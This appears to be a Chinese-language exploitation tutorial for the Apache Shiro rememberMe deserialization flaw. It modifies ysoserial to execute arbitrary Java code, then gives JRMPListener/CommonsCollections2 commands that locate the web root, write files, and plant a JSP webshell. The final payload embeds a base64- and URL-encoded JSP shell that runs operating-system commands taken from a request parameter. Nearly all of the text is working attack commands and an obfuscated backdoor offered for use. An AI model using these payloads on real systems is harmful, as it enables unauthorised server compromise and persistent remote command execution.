Shiro rememberMe 反序列化漏洞寫Webshell

Shiro rememberMe 反序列化漏洞寫Webshell

修改ysoserial使其支持生成java代碼執行Payload

原來的代碼

String cmd = "java.lang.Runtime.getRuntime().exec(\"" +    command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +    "\");";

修改成如下代碼，如果調用ysoserial時候命令參數處有code:就可執行java代碼，否則執行命令

String cmd="";if(!command.startsWith("code:")){    cmd = "java.lang.Runtime.getRuntime().exec(\"" +    command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +    "\");";}else{    System.err.println("Java Code Mode:"+command.substring(5));//使用stderr輸出，防止影響payload的輸出    cmd = command.substring(5);}

然后重新使用mvn編譯ysoserial

獲取網站路徑

java -cp ys.jar ysoserial.exploit.JRMPListener 65005 CommonsCollections2 "code:String p = Thread.currentThread().getContextClassLoader().getResource(\"../../\").getPath();String shellpath =p+\"/pw.txt\";java.io.FileOutputStream fos = new java.io.FileOutputStream(shellpath);java.io.OutputStreamWriter osw = new java.io.OutputStreamWriter(fos);osw.write(p);osw.close();"

向web目錄寫文件

java -cp ys.jar ysoserial.exploit.JRMPListener 65005 CommonsCollections2 "code:String p = Thread.currentThread().getContextClassLoader().getResource(\"../../\").getPath();String shellpath =p+\"/pw.txt\";java.io.FileOutputStream fos = new java.io.FileOutputStream(shellpath);java.io.OutputStreamWriter osw = new java.io.OutputStreamWriter(fos);osw.write(p);osw.close();"

寫webshell

java -cp ys.jar ysoserial.exploit.JRMPListener 65005 CommonsCollections2 "code:String p = Thread.currentThread().getContextClassLoader().getResource(\"../../\").getPath();String shellpath =p+\"/64.jsp\";String shellcontent = \"\";org.apache.commons.codec.binary.Base64 base64 = new org.apache.commons.codec.binary.Base64();String b64shell = new String(base64.decodeBase64(shellcontent.getBytes()));String tmp = java.net.URLDecoder.decode(b64shell, \"UTF-8\");java.io.FileOutputStream fos = new java.io.FileOutputStream(shellpath);java.io.OutputStreamWriter osw = new java.io.OutputStreamWriter(fos);osw.write(tmp);osw.close();"

寫cmd馬

java -cp ys.jar ysoserial.exploit.JRMPListener 65005 CommonsCollections2 "code:String p = Thread.currentThread().getContextClassLoader().getResource(\"../../\").getPath();String shellpath =p+\"/64.jsp\";String shellcontent = \"JTNDJTI1QCUyMHBhZ2UlMjBwYWdlRW5jb2RpbmclM0QlMjJ1dGYtOCUyMiUyNSUzRSUwQSUzQyUyNUAlMjBwYWdlJTIwaW1wb3J0JTNEJTIyamF2YS51dGlsLlNjYW5uZXIlMjIlMjAlMjUlM0UlMEElM0NIVE1MJTNFJTBBJTNDdGl0bGUlM0VKdXN0JTIwRm9yJTIwRnVuJTNDL3RpdGxlJTNFJTBBJTNDQk9EWSUzRSUwQSUzQ0gzJTNFQnVpbGQlMjBCeSUyMExhbmRHcmV5JTNDL0gzJTNFJTBBJTNDRk9STSUyME1FVEhPRCUzRCUyMlBPU1QlMjIlMjBOQU1FJTNEJTIyZm9ybSUyMiUyMEFDVElPTiUzRCUyMiUyMyUyMiUzRSUwQSUyMCUyMCUyMCUyMCUzQ0lOUFVUJTIwVFlQRSUzRCUyMnRleHQlMjIlMjBOQU1FJTNEJTIycSUyMiUzRSUwQSUyMCUyMCUyMCUyMCUzQ0lOUFVUJTIwVFlQRSUzRCUyMnN1Ym1pdCUyMiUyMFZBTFVFJTNEJTIyRmx5JTIyJTNFJTBBJTNDL0ZPUk0lM0UlMEElMEElM0MlMjUlMEElMjAlMjAlMjAlMjBTdHJpbmclMjBvcCUzRCUyMkdvdCUyME5vdGhpbmclMjIlM0IlMEElMjAlMjAlMjAlMjBTdHJpbmclMjBxdWVyeSUyMCUzRCUyMHJlcXVlc3QuZ2V0UGFyYW1ldGVyJTI4JTIycSUyMiUyOSUzQiUwQSUyMCUyMCUyMCUyMFN0cmluZyUyMGZpbGVTZXBhcmF0b3IlMjAlM0QlMjBTdHJpbmcudmFsdWVPZiUyOGphdmEuaW8uRmlsZS5zZXBhcmF0b3JDaGFyJTI5JTNCJTBBJTIwJTIwJTIwJTIwQm9vbGVhbiUyMGlzV2luJTNCJTBBJTIwJTIwJTIwJTIwaWYlMjhmaWxlU2VwYXJhdG9yLmVxdWFscyUyOCUyMiU1QyU1QyUyMiUyOSUyOSU3QiUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMGlzV2luJTIwJTNEJTIwdHJ1ZSUzQiUwQSUyMCUyMCUyMCUyMCU3RGVsc2UlN0IlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjBpc1dpbiUyMCUzRCUyMGZhbHNlJTNCJTBBJTIwJTIwJTIwJTIwJTdEJTBBJTBBJTIwJTIwJTIwJTIwaWYlMjAlMjhxdWVyeSUyMCUyMSUzRCUyMG51bGwlMjklMjAlN0IlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjBQcm9jZXNzQnVpbGRlciUyMHBiJTNCJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwaWYlMjhpc1dpbiUyOSUyMCU3QiUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMHBiJTIwJTNEJTIwbmV3JTIwUHJvY2Vzc0J1aWxkZXIlMjhuZXclMjBTdHJpbmclMjhuZXclMjBieXRlJTVCJTVEJTdCOTklMkMlMjAxMDklMkMlMjAxMDAlN0QlMjklMkMlMjBuZXclMjBTdHJpbmclMjhuZXclMjBieXRlJTVCJTVEJTdCNDclMkMlMjA2NyU3RCUyOSUyQyUyMHF1ZXJ5JTI5JTNCJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTdEZWxzZSU3QiUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMHBiJTIwJTNEJTIwbmV3JTIwUHJvY2Vzc0J1aWxkZXIlMjhuZXclMjBTdHJpbmclMjhuZXclMjBieXRlJTVCJTVEJTdCNDclMkMlMjA5OCUyQyUyMDEwNSUyQyUyMDExMCUyQyUyMDQ3JTJDJTIwOTglMkMlMjA5NyUyQyUyMDExNSUyQyUyMDEwNCU3RCUyOSUyQyUyMG5ldyUyMFN0cmluZyUyOG5ldyUyMGJ5dGUlNUIlNUQlN0I0NSUyQyUyMDk5JTdEJTI5JTJDJTIwcXVlcnklMjklM0IlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlN0QlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjBQcm9jZXNzJTIwcHJvY2VzcyUyMCUzRCUyMHBiLnN0YXJ0JTI4JTI5JTNCJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwU2Nhbm5lciUyMHNjJTIwJTNEJTIwbmV3JTIwU2Nhbm5lciUyOHByb2Nlc3MuZ2V0SW5wdXRTdHJlYW0lMjglMjklMjkudXNlRGVsaW1pdGVyJTI4JTIyJTVDJTVDQSUyMiUyOSUzQiUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMG9wJTIwJTNEJTIwc2MuaGFzTmV4dCUyOCUyOSUyMCUzRiUyMHNjLm5leHQlMjglMjklMjAlM0ElMjBvcCUzQiUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMHNjLmNsb3NlJTI4JTI5JTNCJTBBJTIwJTIwJTIwJTIwJTdEJTBBJTI1JTNFJTBBJTBBJTNDUFJFJTNFJTBBJTIwJTIwJTIwJTIwJTNDJTI1JTNEJTIwb3AlMjAlMjUlM0UlM0UlMEElM0MvUFJFJTNFJTBBJTNDL0JPRFklM0UlMEElM0MvSFRNTCUzRQ==\";org.apache.commons.codec.binary.Base64 base64 = new org.apache.commons.codec.binary.Base64();String b64shell = new String(base64.decodeBase64(shellcontent.getBytes()));String tmp = java.net.URLDecoder.decode(b64shell, \"UTF-8\");java.io.FileOutputStream fos = new java.io.FileOutputStream(shellpath);java.io.OutputStreamWriter osw = new java.io.OutputStreamWriter(fos);osw.write(tmp);osw.close();"